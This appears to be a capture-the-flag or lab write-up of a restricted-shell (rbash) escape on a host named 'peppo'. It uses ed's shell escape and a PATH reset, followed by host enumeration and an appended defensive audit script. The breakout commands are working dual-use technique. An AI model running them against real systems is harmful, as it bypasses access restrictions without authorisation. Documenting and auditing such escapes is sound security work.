rbash Escape
An SSH session has been established to the target system as the eleanor user.
eleanor@peppo:~$ echo $SHELL
/bin/rbash
However, the session is limited because the current shell is rbash.
Environment Variables
eleanor@peppo:~$ export -p
declare -x HOME="/home/eleanor"
declare -x LANG="en_US.UTF-8"
declare -x LOGNAME="eleanor"
declare -x MAIL="/var/mail/eleanor"
declare -x OLDPWD
declare -rx PATH="/home/eleanor/bin"
declare -x PWD="/home/eleanor"
declare -rx SHELL="/bin/rbash"
declare -x SHLVL="1"
declare -x SSH_CLIENT="192.168.45.218 49456 22"
declare -x SSH_CONNECTION="192.168.45.218 49456 192.168.154.60 22"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm-256color"
declare -x USER="eleanor"
declare -x XDG_RUNTIME_DIR="/run/user/1000"
declare -x XDG_SESSION_ID="15"
The environment is very limited; PATH and SHELL are both declared read-only (declare -rx).
$PATH
eleanor@peppo:~$ echo $PATH
/home/eleanor/bin
The $PATH variable points to the /home/eleanor/bin directory.
Binaries
eleanor@peppo:~$ ls -la
total 28
drwxr-xr-x 4 eleanor eleanor 4096 Jul 9 2020 .
drwxr-xr-x 3 root root 4096 May 25 2020 ..
-rw-r--r-- 1 eleanor eleanor 30 Jun 1 2020 .bashrc
drwxr-xr-x 2 eleanor eleanor 4096 Jun 1 2020 bin
drwxr-xr-x 2 root root 4096 Jun 1 2020 helloworld
-rw-r--r-- 1 eleanor eleanor 33 Mar 29 15:54 local.txt
-rw-r--r-- 1 eleanor eleanor 30 Jun 1 2020 .profile
Checking the user's home directory reveals the bin directory.
eleanor@peppo:~$ ls -la ./bin/
total 8
drwxr-xr-x 2 eleanor eleanor 4096 Jun 1 2020 .
drwxr-xr-x 4 eleanor eleanor 4096 Jul 9 2020 ..
lrwxrwxrwx 1 root root 10 Jun 1 2020 chmod -> /bin/chmod
lrwxrwxrwx 1 root root 10 Jun 1 2020 chown -> /bin/chown
lrwxrwxrwx 1 root root 7 Jun 1 2020 ed -> /bin/ed
lrwxrwxrwx 1 root root 7 Jun 1 2020 ls -> /bin/ls
lrwxrwxrwx 1 root root 7 Jun 1 2020 mv -> /bin/mv
lrwxrwxrwx 1 root root 9 Jun 1 2020 ping -> /bin/ping
lrwxrwxrwx 1 root root 10 Jun 1 2020 sleep -> /bin/sleep
lrwxrwxrwx 1 root root 14 Jun 1 2020 touch -> /usr/bin/touch
These are the binaries that the current session is allowed to use.
ed
ed is among them.
According to GTFOBins, ed can be used to break out of restricted environments.
Breakout
eleanor@peppo:~$ ed
!/bin/sh
$
$ echo $SHELL
/bin/rbash
The $SHELL variable is still set to rbash.
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp:$PATH
But I can build the environment around it, starting from the $PATH variable.
$ id
uid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)
$ env
MAIL=/var/mail/eleanor
USER=eleanor
SSH_CLIENT=192.168.45.218 49456 22
SHLVL=1
HOME=/home/eleanor
SSH_TTY=/dev/pts/0
LOGNAME=eleanor
_=/etc/ssh/sshd_config
XDG_SESSION_ID=15
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp:/home/eleanor/bin
XDG_RUNTIME_DIR=/run/user/1000
LANG=en_US.UTF-8
SHELL=/bin/rbash
PWD=/home/eleanor
SSH_CONNECTION=192.168.45.218 49456 192.168.154.60 22
The $SHELL variable is still set to rbash, but all the commands work now.
$ whoami
eleanor
$ hostname
peppo
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:87:bb:a4:ca brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
5: veth6f82195@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether fe:0f:9a:09:8e:9b brd ff:ff:ff:ff:ff:ff link-netnsid 1
7: veth069982c@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 5a:51:6a:02:fe:37 brd ff:ff:ff:ff:ff:ff link-netnsid 0
8: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:e8:b9 brd ff:ff:ff:ff:ff:ff
inet 192.168.154.60/24 brd 192.168.154.255 scope global ens192
valid_lft forever preferred_lft forever
Initial foothold established on the target system as the eleanor user via SSH.
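
From the defender's side, the two weaknesses visible above (a PATH directory owned by the restricted user, and ed exposed inside it) can be checked for before an account is handed out. The following is an added example, not part of the original notes; the function name audit_rbash_path, its arguments, the default denylist (only ed, the binary these notes show abused) and the constructed sample directory are assumptions.

```shell
#!/bin/sh
# Audit the directory a restricted-shell account's PATH points to.
# Usage: audit_rbash_path DIR RESTRICTED_UID [DENYLIST]
# Prints one finding per line; returns 1 if anything was found, 0 if clean.
audit_rbash_path() {
    dir=$1 ruid=$2 deny=${3:-ed}   # default denylist: ed only (assumption; extend as needed)
    found=0

    # rbash marks PATH read-only, but that does not protect the directory it
    # points to: if the restricted user owns it, they control its contents.
    owner=$(ls -ldn "$dir" | awk '{print $3}')
    if [ "$owner" = "$ruid" ]; then
        echo "OWNED: $dir is owned by uid $ruid"
        found=1
    fi

    for entry in "$dir"/*; do
        [ -e "$entry" ] || [ -L "$entry" ] || continue
        # Check both the link name and its target, so a renamed link is still caught.
        target=$entry
        [ -L "$entry" ] && target=$(readlink "$entry")
        for name in $(basename "$entry") $(basename "$target"); do
            for bad in $deny; do
                if [ "$name" = "$bad" ]; then
                    echo "ESCAPE: $entry -> $target can spawn a shell"
                    found=1
                    break 2
                fi
            done
        done
    done
    return $found
}

# Constructed sample mirroring the bin listing in these notes (links need not resolve).
demo=$(mktemp -d)
for b in chmod chown ed ls mv ping sleep; do ln -s "/bin/$b" "$demo/$b"; done
ln -s /usr/bin/touch "$demo/touch"
audit_rbash_path "$demo" "$(id -u)" "ed" || echo "audit failed: fix the findings above"
rm -rf "$demo"
```

On a real host, pass the restricted account's numeric uid (1000 for eleanor in the id output above) and a denylist maintained from the GTFOBins shell category.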